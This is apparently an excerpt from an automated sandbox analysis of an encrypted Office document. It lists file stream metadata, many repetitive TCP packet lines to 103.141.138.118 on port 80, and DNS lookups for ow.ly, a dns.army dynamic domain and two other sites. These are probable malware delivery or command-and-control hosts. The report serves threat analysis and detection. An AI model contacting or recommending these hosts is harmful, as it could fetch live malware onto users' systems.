                                                                                                                                                          Data ASCII:X . . . . . . . L . . . { . F . F . 9 . A . 3 . F . 0 . 3 . - . 5 . 6 . E . F . - . 4 . 6 . 1 . 3 . - . B . D . D . 5 . - . 5 . A . 4 . 1 . C . 1 . D . 0 . 7 . 2 . 4 . 6 . } . N . . . M . i . c . r . o . s . o . f . t . . . C . o . n . t . a . i . n . e . r . . . E . n . c . r . y . p . t . i . o . n . T . r . a . n . s . f . o . r . m . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                                                          Stream Path: \x6DataSpaces/Version, File Type: data, Stream Size: 76
                                                                                                                                                          General
                                                                                                                                                          Stream Path:\x6DataSpaces/Version
                                                                                                                                                          File Type:data
                                                                                                                                                          Stream Size:76
                                                                                                                                                          Entropy:2.79079600998
                                                                                                                                                          Base64 Encoded:False
                                                                                                                                                          Data ASCII:< . . . M . i . c . r . o . s . o . f . t . . . C . o . n . t . a . i . n . e . r . . . D . a . t . a . S . p . a . c . e . s . . . . . . . . . . . . .
                                                                                                                                                          Stream Path: EncryptedPackage, File Type: data, Stream Size: 2488776
                                                                                                                                                          General
                                                                                                                                                          Stream Path:EncryptedPackage
                                                                                                                                                          File Type:data
                                                                                                                                                          Stream Size:2488776
                                                                                                                                                          Entropy:7.9999180457
                                                                                                                                                          Base64 Encoded:True
                                                                                                                                                          Stream Path: EncryptionInfo, File Type: data, Stream Size: 224
                                                                                                                                                          General
                                                                                                                                                          Stream Path:EncryptionInfo
                                                                                                                                                          File Type:data
                                                                                                                                                          Stream Size:224
                                                                                                                                                          Entropy:4.58785976805
                                                                                                                                                          Base64 Encoded:False

                                                                                                                                                          Network Behavior

                                                                                                                                                          Network Port Distribution

                                                                                                                                                          TCP Packets

                                                                                                                                                          Feb 23, 2021 17:47:43.684465885 CET8049166103.141.138.118192.168.2.22
                                                                                                                                                          Feb 23, 2021 17:47:43.684472084 CET4916680192.168.2.22103.141.138.118
                                                                                                                                                          Feb 23, 2021 17:47:43.684529066 CET8049166103.141.138.118192.168.2.22
                                                                                                                                                          Feb 23, 2021 17:47:43.684534073 CET4916680192.168.2.22103.141.138.118
                                                                                                                                                          Feb 23, 2021 17:47:43.684674978 CET8049166103.141.138.118192.168.2.22
                                                                                                                                                          Feb 23, 2021 17:47:43.684740067 CET4916680192.168.2.22103.141.138.118
                                                                                                                                                          Feb 23, 2021 17:47:43.684761047 CET8049166103.141.138.118192.168.2.22
                                                                                                                                                          Feb 23, 2021 17:47:43.684803963 CET4916680192.168.2.22103.141.138.118
                                                                                                                                                          Feb 23, 2021 17:47:43.684818029 CET4916680192.168.2.22103.141.138.118
                                                                                                                                                          Feb 23, 2021 17:47:43.685642958 CET8049166103.141.138.118192.168.2.22
                                                                                                                                                          Feb 23, 2021 17:47:43.685705900 CET4916680192.168.2.22103.141.138.118
                                                                                                                                                          Feb 23, 2021 17:47:43.685731888 CET8049166103.141.138.118192.168.2.22
                                                                                                                                                          Feb 23, 2021 17:47:43.685786963 CET4916680192.168.2.22103.141.138.118
                                                                                                                                                          Feb 23, 2021 17:47:43.685794115 CET8049166103.141.138.118192.168.2.22
                                                                                                                                                          Feb 23, 2021 17:47:43.685846090 CET4916680192.168.2.22103.141.138.118
                                                                                                                                                          Feb 23, 2021 17:47:43.685854912 CET8049166103.141.138.118192.168.2.22
                                                                                                                                                          Feb 23, 2021 17:47:43.685905933 CET4916680192.168.2.22103.141.138.118
                                                                                                                                                          Feb 23, 2021 17:47:43.685914040 CET8049166103.141.138.118192.168.2.22
                                                                                                                                                          Feb 23, 2021 17:47:43.685972929 CET4916680192.168.2.22103.141.138.118
                                                                                                                                                          Feb 23, 2021 17:47:43.685997963 CET8049166103.141.138.118192.168.2.22
                                                                                                                                                          Feb 23, 2021 17:47:43.686053038 CET4916680192.168.2.22103.141.138.118
                                                                                                                                                          Feb 23, 2021 17:47:43.686068058 CET8049166103.141.138.118192.168.2.22
                                                                                                                                                          Feb 23, 2021 17:47:43.686120987 CET4916680192.168.2.22103.141.138.118
                                                                                                                                                          Feb 23, 2021 17:47:43.686136961 CET8049166103.141.138.118192.168.2.22
                                                                                                                                                          Feb 23, 2021 17:47:43.686203003 CET4916680192.168.2.22103.141.138.118
                                                                                                                                                          Feb 23, 2021 17:47:43.686212063 CET8049166103.141.138.118192.168.2.22
                                                                                                                                                          Feb 23, 2021 17:47:43.686254025 CET4916680192.168.2.22103.141.138.118
                                                                                                                                                          Feb 23, 2021 17:47:43.686260939 CET4916680192.168.2.22103.141.138.118
                                                                                                                                                          Feb 23, 2021 17:47:43.686274052 CET8049166103.141.138.118192.168.2.22
                                                                                                                                                          Feb 23, 2021 17:47:43.686326027 CET4916680192.168.2.22103.141.138.118
                                                                                                                                                          Feb 23, 2021 17:47:43.686336040 CET8049166103.141.138.118192.168.2.22
                                                                                                                                                          Feb 23, 2021 17:47:43.686392069 CET4916680192.168.2.22103.141.138.118
                                                                                                                                                          Feb 23, 2021 17:47:43.686395884 CET8049166103.141.138.118192.168.2.22
                                                                                                                                                          Feb 23, 2021 17:47:43.686450958 CET4916680192.168.2.22103.141.138.118
                                                                                                                                                          Feb 23, 2021 17:47:43.686455011 CET8049166103.141.138.118192.168.2.22
                                                                                                                                                          Feb 23, 2021 17:47:43.686506987 CET4916680192.168.2.22103.141.138.118
                                                                                                                                                          Feb 23, 2021 17:47:43.686515093 CET8049166103.141.138.118192.168.2.22
                                                                                                                                                          Feb 23, 2021 17:47:43.686568975 CET4916680192.168.2.22103.141.138.118
                                                                                                                                                          Feb 23, 2021 17:47:43.686583042 CET8049166103.141.138.118192.168.2.22
                                                                                                                                                          Feb 23, 2021 17:47:43.686633110 CET4916680192.168.2.22103.141.138.118
                                                                                                                                                          Feb 23, 2021 17:47:43.686650038 CET8049166103.141.138.118192.168.2.22
                                                                                                                                                          Feb 23, 2021 17:47:43.686707973 CET4916680192.168.2.22103.141.138.118
                                                                                                                                                          Feb 23, 2021 17:47:43.686717987 CET8049166103.141.138.118192.168.2.22
                                                                                                                                                          Feb 23, 2021 17:47:43.686760902 CET8049166103.141.138.118192.168.2.22
                                                                                                                                                          Feb 23, 2021 17:47:43.686798096 CET8049166103.141.138.118192.168.2.22
                                                                                                                                                          Feb 23, 2021 17:47:43.686839104 CET8049166103.141.138.118192.168.2.22
                                                                                                                                                          Feb 23, 2021 17:47:43.686839104 CET4916680192.168.2.22103.141.138.118
                                                                                                                                                          Feb 23, 2021 17:47:43.686867952 CET4916680192.168.2.22103.141.138.118
                                                                                                                                                          Feb 23, 2021 17:47:43.686872959 CET4916680192.168.2.22103.141.138.118
                                                                                                                                                          Feb 23, 2021 17:47:43.686876059 CET8049166103.141.138.118192.168.2.22
                                                                                                                                                          Feb 23, 2021 17:47:43.686904907 CET4916680192.168.2.22103.141.138.118
                                                                                                                                                          Feb 23, 2021 17:47:43.686917067 CET8049166103.141.138.118192.168.2.22
                                                                                                                                                          Feb 23, 2021 17:47:43.686919928 CET4916680192.168.2.22103.141.138.118
                                                                                                                                                          Feb 23, 2021 17:47:43.686954975 CET8049166103.141.138.118192.168.2.22
                                                                                                                                                          Feb 23, 2021 17:47:43.686988115 CET4916680192.168.2.22103.141.138.118
                                                                                                                                                          Feb 23, 2021 17:47:43.687002897 CET4916680192.168.2.22103.141.138.118
                                                                                                                                                          Feb 23, 2021 17:47:43.687004089 CET8049166103.141.138.118192.168.2.22
                                                                                                                                                          Feb 23, 2021 17:47:43.687091112 CET4916680192.168.2.22103.141.138.118
                                                                                                                                                          Feb 23, 2021 17:47:43.694710970 CET4916680192.168.2.22103.141.138.118
                                                                                                                                                          Feb 23, 2021 17:47:43.697392941 CET4916680192.168.2.22103.141.138.118
                                                                                                                                                          Feb 23, 2021 17:47:43.906852961 CET8049166103.141.138.118192.168.2.22
                                                                                                                                                          Feb 23, 2021 17:47:43.906899929 CET8049166103.141.138.118192.168.2.22
                                                                                                                                                          Feb 23, 2021 17:47:43.906949043 CET8049166103.141.138.118192.168.2.22
                                                                                                                                                          Feb 23, 2021 17:47:43.906997919 CET8049166103.141.138.118192.168.2.22
                                                                                                                                                          Feb 23, 2021 17:47:43.907037020 CET8049166103.141.138.118192.168.2.22
                                                                                                                                                          Feb 23, 2021 17:47:43.907078028 CET8049166103.141.138.118192.168.2.22
                                                                                                                                                          Feb 23, 2021 17:47:43.907099009 CET4916680192.168.2.22103.141.138.118
                                                                                                                                                          Feb 23, 2021 17:47:43.907119989 CET8049166103.141.138.118192.168.2.22
                                                                                                                                                          Feb 23, 2021 17:47:43.907133102 CET4916680192.168.2.22103.141.138.118
                                                                                                                                                          Feb 23, 2021 17:47:43.907157898 CET8049166103.141.138.118192.168.2.22
                                                                                                                                                          Feb 23, 2021 17:47:43.907181025 CET4916680192.168.2.22103.141.138.118
                                                                                                                                                          Feb 23, 2021 17:47:43.907213926 CET4916680192.168.2.22103.141.138.118
                                                                                                                                                          Feb 23, 2021 17:47:43.909596920 CET8049166103.141.138.118192.168.2.22
                                                                                                                                                          Feb 23, 2021 17:47:43.909640074 CET8049166103.141.138.118192.168.2.22
                                                                                                                                                          Feb 23, 2021 17:47:43.909691095 CET8049166103.141.138.118192.168.2.22
                                                                                                                                                          Feb 23, 2021 17:47:43.909698009 CET4916680192.168.2.22103.141.138.118
                                                                                                                                                          Feb 23, 2021 17:47:43.909734964 CET8049166103.141.138.118192.168.2.22
                                                                                                                                                          Feb 23, 2021 17:47:43.909746885 CET4916680192.168.2.22103.141.138.118
                                                                                                                                                          Feb 23, 2021 17:47:43.909774065 CET8049166103.141.138.118192.168.2.22
                                                                                                                                                          Feb 23, 2021 17:47:43.909790039 CET4916680192.168.2.22103.141.138.118
                                                                                                                                                          Feb 23, 2021 17:47:43.909812927 CET8049166103.141.138.118192.168.2.22
                                                                                                                                                          Feb 23, 2021 17:47:43.909826040 CET4916680192.168.2.22103.141.138.118
                                                                                                                                                          Feb 23, 2021 17:47:43.909853935 CET8049166103.141.138.118192.168.2.22
                                                                                                                                                          Feb 23, 2021 17:47:43.909863949 CET4916680192.168.2.22103.141.138.118
                                                                                                                                                          Feb 23, 2021 17:47:43.909890890 CET8049166103.141.138.118192.168.2.22
                                                                                                                                                          Feb 23, 2021 17:47:43.909904003 CET4916680192.168.2.22103.141.138.118
                                                                                                                                                          Feb 23, 2021 17:47:43.909929991 CET8049166103.141.138.118192.168.2.22
                                                                                                                                                          Feb 23, 2021 17:47:43.909946918 CET4916680192.168.2.22103.141.138.118
                                                                                                                                                          Feb 23, 2021 17:47:43.909966946 CET8049166103.141.138.118192.168.2.22
                                                                                                                                                          Feb 23, 2021 17:47:43.909989119 CET4916680192.168.2.22103.141.138.118
                                                                                                                                                          Feb 23, 2021 17:47:43.910020113 CET4916680192.168.2.22103.141.138.118
                                                                                                                                                          Feb 23, 2021 17:47:43.910022020 CET8049166103.141.138.118192.168.2.22
                                                                                                                                                          Feb 23, 2021 17:47:43.910067081 CET8049166103.141.138.118192.168.2.22
                                                                                                                                                          Feb 23, 2021 17:47:43.910078049 CET4916680192.168.2.22103.141.138.118
                                                                                                                                                          Feb 23, 2021 17:47:43.910104990 CET8049166103.141.138.118192.168.2.22
                                                                                                                                                          Feb 23, 2021 17:47:43.910119057 CET4916680192.168.2.22103.141.138.118
                                                                                                                                                          Feb 23, 2021 17:47:43.910152912 CET8049166103.141.138.118192.168.2.22
                                                                                                                                                          Feb 23, 2021 17:47:43.910154104 CET4916680192.168.2.22103.141.138.118
                                                                                                                                                          Feb 23, 2021 17:47:43.910196066 CET8049166103.141.138.118192.168.2.22
                                                                                                                                                          Feb 23, 2021 17:47:43.910207033 CET4916680192.168.2.22103.141.138.118
                                                                                                                                                          Feb 23, 2021 17:47:43.910233021 CET8049166103.141.138.118192.168.2.22
                                                                                                                                                          Feb 23, 2021 17:47:43.910248041 CET4916680192.168.2.22103.141.138.118
                                                                                                                                                          Feb 23, 2021 17:47:43.910271883 CET8049166103.141.138.118192.168.2.22
                                                                                                                                                          Feb 23, 2021 17:47:43.910288095 CET4916680192.168.2.22103.141.138.118
                                                                                                                                                          Feb 23, 2021 17:47:43.910310984 CET8049166103.141.138.118192.168.2.22
                                                                                                                                                          Feb 23, 2021 17:47:43.910322905 CET4916680192.168.2.22103.141.138.118
                                                                                                                                                          Feb 23, 2021 17:47:43.910351038 CET8049166103.141.138.118192.168.2.22
                                                                                                                                                          Feb 23, 2021 17:47:43.910362005 CET4916680192.168.2.22103.141.138.118
                                                                                                                                                          Feb 23, 2021 17:47:43.910391092 CET8049166103.141.138.118192.168.2.22
                                                                                                                                                          Feb 23, 2021 17:47:43.910402060 CET4916680192.168.2.22103.141.138.118
                                                                                                                                                          Feb 23, 2021 17:47:43.910429955 CET8049166103.141.138.118192.168.2.22
                                                                                                                                                          Feb 23, 2021 17:47:43.910443068 CET4916680192.168.2.22103.141.138.118
                                                                                                                                                          Feb 23, 2021 17:47:43.910478115 CET8049166103.141.138.118192.168.2.22
                                                                                                                                                          Feb 23, 2021 17:47:43.910480022 CET4916680192.168.2.22103.141.138.118
                                                                                                                                                          Feb 23, 2021 17:47:43.910521984 CET8049166103.141.138.118192.168.2.22
                                                                                                                                                          Feb 23, 2021 17:47:43.910532951 CET4916680192.168.2.22103.141.138.118
                                                                                                                                                          Feb 23, 2021 17:47:43.910574913 CET4916680192.168.2.22103.141.138.118
                                                                                                                                                          Feb 23, 2021 17:47:43.912488937 CET4916680192.168.2.22103.141.138.118
                                                                                                                                                          Feb 23, 2021 17:47:43.917115927 CET8049166103.141.138.118192.168.2.22
                                                                                                                                                          Feb 23, 2021 17:47:43.917167902 CET8049166103.141.138.118192.168.2.22
                                                                                                                                                          Feb 23, 2021 17:47:43.917201042 CET4916680192.168.2.22103.141.138.118
                                                                                                                                                          Feb 23, 2021 17:47:43.917212009 CET8049166103.141.138.118192.168.2.22
                                                                                                                                                          Feb 23, 2021 17:47:43.917212963 CET4916680192.168.2.22103.141.138.118
                                                                                                                                                          Feb 23, 2021 17:47:43.917251110 CET4916680192.168.2.22103.141.138.118
                                                                                                                                                          Feb 23, 2021 17:47:43.919857025 CET8049166103.141.138.118192.168.2.22
                                                                                                                                                          Feb 23, 2021 17:47:44.358150959 CET4916680192.168.2.22103.141.138.118
                                                                                                                                                          Feb 23, 2021 17:47:44.358181000 CET4916680192.168.2.22103.141.138.118
                                                                                                                                                          Feb 23, 2021 17:47:44.358182907 CET8049166103.141.138.118192.168.2.22
                                                                                                                                                          Feb 23, 2021 17:47:44.358220100 CET8049166103.141.138.118192.168.2.22
                                                                                                                                                          Feb 23, 2021 17:47:44.358232021 CET4916680192.168.2.22103.141.138.118
                                                                                                                                                          Feb 23, 2021 17:47:44.358258963 CET8049166103.141.138.118192.168.2.22
                                                                                                                                                          Feb 23, 2021 17:47:44.358261108 CET4916680192.168.2.22103.141.138.118
                                                                                                                                                          Feb 23, 2021 17:47:44.358298063 CET8049166103.141.138.118192.168.2.22
                                                                                                                                                          Feb 23, 2021 17:47:44.358309031 CET4916680192.168.2.22103.141.138.118
                                                                                                                                                          Feb 23, 2021 17:47:44.358335972 CET8049166103.141.138.118192.168.2.22
                                                                                                                                                          Feb 23, 2021 17:47:44.358340025 CET4916680192.168.2.22103.141.138.118
                                                                                                                                                          Feb 23, 2021 17:47:44.358369112 CET4916680192.168.2.22103.141.138.118
                                                                                                                                                          Feb 23, 2021 17:47:44.358374119 CET8049166103.141.138.118192.168.2.22
                                                                                                                                                          Feb 23, 2021 17:47:44.358429909 CET8049166103.141.138.118192.168.2.22
                                                                                                                                                          Feb 23, 2021 17:47:44.358436108 CET4916680192.168.2.22103.141.138.118
                                                                                                                                                          Feb 23, 2021 17:47:44.358465910 CET4916680192.168.2.22103.141.138.118
                                                                                                                                                          Feb 23, 2021 17:47:44.358478069 CET8049166103.141.138.118192.168.2.22
                                                                                                                                                          Feb 23, 2021 17:47:44.358520031 CET8049166103.141.138.118192.168.2.22
                                                                                                                                                          Feb 23, 2021 17:47:44.358525991 CET4916680192.168.2.22103.141.138.118
                                                                                                                                                          Feb 23, 2021 17:47:44.358553886 CET4916680192.168.2.22103.141.138.118
                                                                                                                                                          Feb 23, 2021 17:47:44.358557940 CET8049166103.141.138.118192.168.2.22
                                                                                                                                                          Feb 23, 2021 17:47:44.358597040 CET8049166103.141.138.118192.168.2.22
                                                                                                                                                          Feb 23, 2021 17:47:44.358607054 CET4916680192.168.2.22103.141.138.118
                                                                                                                                                          Feb 23, 2021 17:47:44.358635902 CET8049166103.141.138.118192.168.2.22
                                                                                                                                                          Feb 23, 2021 17:47:44.358635902 CET4916680192.168.2.22103.141.138.118
                                                                                                                                                          Feb 23, 2021 17:47:44.358673096 CET8049166103.141.138.118192.168.2.22
                                                                                                                                                          Feb 23, 2021 17:47:44.358686924 CET4916680192.168.2.22103.141.138.118
                                                                                                                                                          Feb 23, 2021 17:47:44.358711958 CET8049166103.141.138.118192.168.2.22
                                                                                                                                                          Feb 23, 2021 17:47:44.358714104 CET4916680192.168.2.22103.141.138.118
                                                                                                                                                          Feb 23, 2021 17:47:44.358751059 CET8049166103.141.138.118192.168.2.22
                                                                                                                                                          Feb 23, 2021 17:47:44.358762026 CET4916680192.168.2.22103.141.138.118
                                                                                                                                                          Feb 23, 2021 17:47:44.358798981 CET4916680192.168.2.22103.141.138.118
                                                                                                                                                          Feb 23, 2021 17:47:44.358798981 CET8049166103.141.138.118192.168.2.22
                                                                                                                                                          Feb 23, 2021 17:47:44.358843088 CET8049166103.141.138.118192.168.2.22
                                                                                                                                                          Feb 23, 2021 17:47:44.358849049 CET4916680192.168.2.22103.141.138.118
                                                                                                                                                          Feb 23, 2021 17:47:44.358876944 CET4916680192.168.2.22103.141.138.118
                                                                                                                                                          Feb 23, 2021 17:47:44.358881950 CET8049166103.141.138.118192.168.2.22
                                                                                                                                                          Feb 23, 2021 17:47:44.358921051 CET8049166103.141.138.118192.168.2.22
                                                                                                                                                          Feb 23, 2021 17:47:44.358931065 CET4916680192.168.2.22103.141.138.118
                                                                                                                                                          Feb 23, 2021 17:47:44.358958006 CET4916680192.168.2.22103.141.138.118
                                                                                                                                                          Feb 23, 2021 17:47:44.358959913 CET8049166103.141.138.118192.168.2.22
                                                                                                                                                          Feb 23, 2021 17:47:44.358997107 CET8049166103.141.138.118192.168.2.22
                                                                                                                                                          Feb 23, 2021 17:47:44.359008074 CET4916680192.168.2.22103.141.138.118
                                                                                                                                                          Feb 23, 2021 17:47:44.359035015 CET4916680192.168.2.22103.141.138.118
                                                                                                                                                          Feb 23, 2021 17:47:44.359036922 CET8049166103.141.138.118192.168.2.22
                                                                                                                                                          Feb 23, 2021 17:47:44.359075069 CET8049166103.141.138.118192.168.2.22
                                                                                                                                                          Feb 23, 2021 17:47:44.359085083 CET4916680192.168.2.22103.141.138.118
                                                                                                                                                          Feb 23, 2021 17:47:44.359118938 CET4916680192.168.2.22103.141.138.118
                                                                                                                                                          Feb 23, 2021 17:47:44.359122038 CET8049166103.141.138.118192.168.2.22
                                                                                                                                                          Feb 23, 2021 17:47:44.359164953 CET8049166103.141.138.118192.168.2.22
                                                                                                                                                          Feb 23, 2021 17:47:44.359169960 CET4916680192.168.2.22103.141.138.118
                                                                                                                                                          Feb 23, 2021 17:47:44.359196901 CET4916680192.168.2.22103.141.138.118
                                                                                                                                                          Feb 23, 2021 17:47:44.359203100 CET8049166103.141.138.118192.168.2.22
                                                                                                                                                          Feb 23, 2021 17:47:44.359241962 CET8049166103.141.138.118192.168.2.22
                                                                                                                                                          Feb 23, 2021 17:47:44.359246969 CET4916680192.168.2.22103.141.138.118
                                                                                                                                                          Feb 23, 2021 17:47:44.359273911 CET4916680192.168.2.22103.141.138.118
                                                                                                                                                          Feb 23, 2021 17:47:44.368191004 CET8049166103.141.138.118192.168.2.22
                                                                                                                                                          Feb 23, 2021 17:47:44.368247032 CET8049166103.141.138.118192.168.2.22
                                                                                                                                                          Feb 23, 2021 17:47:44.368295908 CET8049166103.141.138.118192.168.2.22
                                                                                                                                                          Feb 23, 2021 17:47:44.368304014 CET4916680192.168.2.22103.141.138.118
                                                                                                                                                          Feb 23, 2021 17:47:44.368325949 CET4916680192.168.2.22103.141.138.118
                                                                                                                                                          Feb 23, 2021 17:47:44.368330002 CET4916680192.168.2.22103.141.138.118
                                                                                                                                                          Feb 23, 2021 17:47:44.368339062 CET8049166103.141.138.118192.168.2.22
                                                                                                                                                          Feb 23, 2021 17:47:44.368376970 CET4916680192.168.2.22103.141.138.118
                                                                                                                                                          Feb 23, 2021 17:47:44.368587971 CET8049166103.141.138.118192.168.2.22
                                                                                                                                                          Feb 23, 2021 17:47:44.368627071 CET4916680192.168.2.22103.141.138.118
                                                                                                                                                          Feb 23, 2021 17:47:44.368632078 CET8049166103.141.138.118192.168.2.22
                                                                                                                                                          Feb 23, 2021 17:47:44.368669987 CET4916680192.168.2.22103.141.138.118
                                                                                                                                                          Feb 23, 2021 17:47:44.368670940 CET8049166103.141.138.118192.168.2.22
                                                                                                                                                          Feb 23, 2021 17:47:44.368709087 CET4916680192.168.2.22103.141.138.118
                                                                                                                                                          Feb 23, 2021 17:47:44.368710995 CET8049166103.141.138.118192.168.2.22
                                                                                                                                                          Feb 23, 2021 17:47:44.368757963 CET4916680192.168.2.22103.141.138.118
                                                                                                                                                          Feb 23, 2021 17:47:44.368762016 CET8049166103.141.138.118192.168.2.22
                                                                                                                                                          Feb 23, 2021 17:47:44.368798971 CET8049166103.141.138.118192.168.2.22
                                                                                                                                                          Feb 23, 2021 17:47:44.368798971 CET4916680192.168.2.22103.141.138.118
                                                                                                                                                          Feb 23, 2021 17:47:44.368837118 CET4916680192.168.2.22103.141.138.118
                                                                                                                                                          Feb 23, 2021 17:47:44.368838072 CET8049166103.141.138.118192.168.2.22
                                                                                                                                                          Feb 23, 2021 17:47:44.368875027 CET4916680192.168.2.22103.141.138.118
                                                                                                                                                          Feb 23, 2021 17:47:44.368875980 CET8049166103.141.138.118192.168.2.22
                                                                                                                                                          Feb 23, 2021 17:47:44.368911982 CET4916680192.168.2.22103.141.138.118
                                                                                                                                                          Feb 23, 2021 17:47:44.368922949 CET8049166103.141.138.118192.168.2.22
                                                                                                                                                          Feb 23, 2021 17:47:44.368961096 CET4916680192.168.2.22103.141.138.118
                                                                                                                                                          Feb 23, 2021 17:47:44.368967056 CET8049166103.141.138.118192.168.2.22
                                                                                                                                                          Feb 23, 2021 17:47:44.369004011 CET4916680192.168.2.22103.141.138.118
                                                                                                                                                          Feb 23, 2021 17:47:44.369004965 CET8049166103.141.138.118192.168.2.22
                                                                                                                                                          Feb 23, 2021 17:47:44.369039059 CET4916680192.168.2.22103.141.138.118
                                                                                                                                                          Feb 23, 2021 17:47:44.369045019 CET8049166103.141.138.118192.168.2.22
                                                                                                                                                          Feb 23, 2021 17:47:44.369081020 CET4916680192.168.2.22103.141.138.118
                                                                                                                                                          Feb 23, 2021 17:47:44.369082928 CET8049166103.141.138.118192.168.2.22
                                                                                                                                                          Feb 23, 2021 17:47:44.369119883 CET4916680192.168.2.22103.141.138.118
                                                                                                                                                          Feb 23, 2021 17:47:44.369121075 CET8049166103.141.138.118192.168.2.22
                                                                                                                                                          Feb 23, 2021 17:47:44.369158030 CET4916680192.168.2.22103.141.138.118
                                                                                                                                                          Feb 23, 2021 17:47:44.369159937 CET8049166103.141.138.118192.168.2.22
                                                                                                                                                          Feb 23, 2021 17:47:44.369194984 CET4916680192.168.2.22103.141.138.118
                                                                                                                                                          Feb 23, 2021 17:47:44.369198084 CET8049166103.141.138.118192.168.2.22
                                                                                                                                                          Feb 23, 2021 17:47:44.369231939 CET4916680192.168.2.22103.141.138.118
                                                                                                                                                          Feb 23, 2021 17:47:44.369245052 CET8049166103.141.138.118192.168.2.22
                                                                                                                                                          Feb 23, 2021 17:47:44.369281054 CET4916680192.168.2.22103.141.138.118
                                                                                                                                                          Feb 23, 2021 17:47:44.369287968 CET8049166103.141.138.118192.168.2.22
                                                                                                                                                          Feb 23, 2021 17:47:44.369324923 CET4916680192.168.2.22103.141.138.118
                                                                                                                                                          Feb 23, 2021 17:47:44.369324923 CET8049166103.141.138.118192.168.2.22
                                                                                                                                                          Feb 23, 2021 17:47:44.369365931 CET4916680192.168.2.22103.141.138.118
                                                                                                                                                          Feb 23, 2021 17:47:44.369374990 CET8049166103.141.138.118192.168.2.22
                                                                                                                                                          Feb 23, 2021 17:47:44.369410038 CET4916680192.168.2.22103.141.138.118
                                                                                                                                                          Feb 23, 2021 17:47:44.369436979 CET8049166103.141.138.118192.168.2.22
                                                                                                                                                          Feb 23, 2021 17:47:44.369473934 CET4916680192.168.2.22103.141.138.118
                                                                                                                                                          Feb 23, 2021 17:47:44.369474888 CET8049166103.141.138.118192.168.2.22
                                                                                                                                                          Feb 23, 2021 17:47:44.369512081 CET4916680192.168.2.22103.141.138.118
                                                                                                                                                          Feb 23, 2021 17:47:44.369513988 CET8049166103.141.138.118192.168.2.22
                                                                                                                                                          Feb 23, 2021 17:47:44.369549990 CET4916680192.168.2.22103.141.138.118
                                                                                                                                                          Feb 23, 2021 17:47:44.369551897 CET8049166103.141.138.118192.168.2.22
                                                                                                                                                          Feb 23, 2021 17:47:44.369587898 CET4916680192.168.2.22103.141.138.118
                                                                                                                                                          Feb 23, 2021 17:47:44.369590044 CET8049166103.141.138.118192.168.2.22
                                                                                                                                                          Feb 23, 2021 17:47:44.369626999 CET4916680192.168.2.22103.141.138.118
                                                                                                                                                          Feb 23, 2021 17:47:44.369637012 CET8049166103.141.138.118192.168.2.22
                                                                                                                                                          Feb 23, 2021 17:47:44.369674921 CET4916680192.168.2.22103.141.138.118
                                                                                                                                                          Feb 23, 2021 17:47:44.369679928 CET8049166103.141.138.118192.168.2.22
                                                                                                                                                          Feb 23, 2021 17:47:44.369716883 CET4916680192.168.2.22103.141.138.118
                                                                                                                                                          Feb 23, 2021 17:47:44.369718075 CET8049166103.141.138.118192.168.2.22
                                                                                                                                                          Feb 23, 2021 17:47:44.369755030 CET4916680192.168.2.22103.141.138.118
                                                                                                                                                          Feb 23, 2021 17:47:44.369756937 CET8049166103.141.138.118192.168.2.22
                                                                                                                                                          Feb 23, 2021 17:47:44.369791985 CET4916680192.168.2.22103.141.138.118
                                                                                                                                                          Feb 23, 2021 17:47:44.369795084 CET8049166103.141.138.118192.168.2.22
                                                                                                                                                          Feb 23, 2021 17:47:44.369832993 CET4916680192.168.2.22103.141.138.118
                                                                                                                                                          Feb 23, 2021 17:47:44.576122999 CET8049166103.141.138.118192.168.2.22

                                                                                                                                                          UDP Packets


                                                                                                                                                          DNS Queries

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
Feb 23, 2021 17:47:41.639518023 CET | 192.168.2.22 | 8.8.8.8 | 0x68ca | Standard query (0) | ow.ly | A (IP address) | IN (0x0001)
Feb 23, 2021 17:47:41.697361946 CET | 192.168.2.22 | 8.8.8.8 | 0x68ca | Standard query (0) | ow.ly | A (IP address) | IN (0x0001)
Feb 23, 2021 17:47:42.210675955 CET | 192.168.2.22 | 8.8.8.8 | 0xc2de | Standard query (0) | thdyworkfinerainbotm.dns.army | A (IP address) | IN (0x0001)
Feb 23, 2021 17:47:42.278484106 CET | 192.168.2.22 | 8.8.8.8 | 0xc2de | Standard query (0) | thdyworkfinerainbotm.dns.army | A (IP address) | IN (0x0001)
Feb 23, 2021 17:48:45.857974052 CET | 192.168.2.22 | 8.8.8.8 | 0xccff | Standard query (0) | www.jtelitetraining.com | A (IP address) | IN (0x0001)
Feb 23, 2021 17:49:02.190536022 CET | 192.168.2.22 | 8.8.8.8 | 0x2e78 | Standard query (0) | www.tiwapay.com | A (IP address) | IN (0x0001)

                                                                                                                                                          DNS Answers

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
Feb 23, 2021 17:47:41.697148085 CET | 8.8.8.8 | 192.168.2.22 | 0x68ca | No error (0) | ow.ly | | 54.67.120.65 | A (IP address) | IN (0x0001)
Feb 23, 2021 17:47:41.697148085 CET | 8.8.8.8 | 192.168.2.22 | 0x68ca | No error (0) | ow.ly | | 54.67.62.204 | A (IP address) | IN (0x0001)
Feb 23, 2021 17:47:41.697148085 CET | 8.8.8.8 | 192.168.2.22 | 0x68ca | No error (0) | ow.ly | | 54.183.132.164 | A (IP address) | IN (0x0001)
Feb 23, 2021 17:47:41.697148085 CET | 8.8.8.8 | 192.168.2.22 | 0x68ca | No error (0) | ow.ly | | 54.67.57.56 | A (IP address) | IN (0x0001)
Feb 23, 2021 17:47:41.697148085 CET | 8.8.8.8 | 192.168.2.22 | 0x68ca | No error (0) | ow.ly | | 54.183.131.91 | A (IP address) | IN (0x0001)
Feb 23, 2021 17:47:41.754817009 CET | 8.8.8.8 | 192.168.2.22 | 0x68ca | No error (0) | ow.ly | | 54.67.120.65 | A (IP address) | IN (0x0001)
Feb 23, 2021 17:47:41.754817009 CET | 8.8.8.8 | 192.168.2.22 | 0x68ca | No error (0) | ow.ly | | 54.67.62.204 | A (IP address) | IN (0x0001)
Feb 23, 2021 17:47:41.754817009 CET | 8.8.8.8 | 192.168.2.22 | 0x68ca | No error (0) | ow.ly | | 54.183.132.164 | A (IP address) | IN (0x0001)
Feb 23, 2021 17:47:41.754817009 CET | 8.8.8.8 | 192.168.2.22 | 0x68ca | No error (0) | ow.ly | | 54.67.57.56 | A (IP address) | IN (0x0001)
Feb 23, 2021 17:47:41.754817009 CET | 8.8.8.8 | 192.168.2.22 | 0x68ca | No error (0) | ow.ly | | 54.183.131.91 | A (IP address) | IN (0x0001)
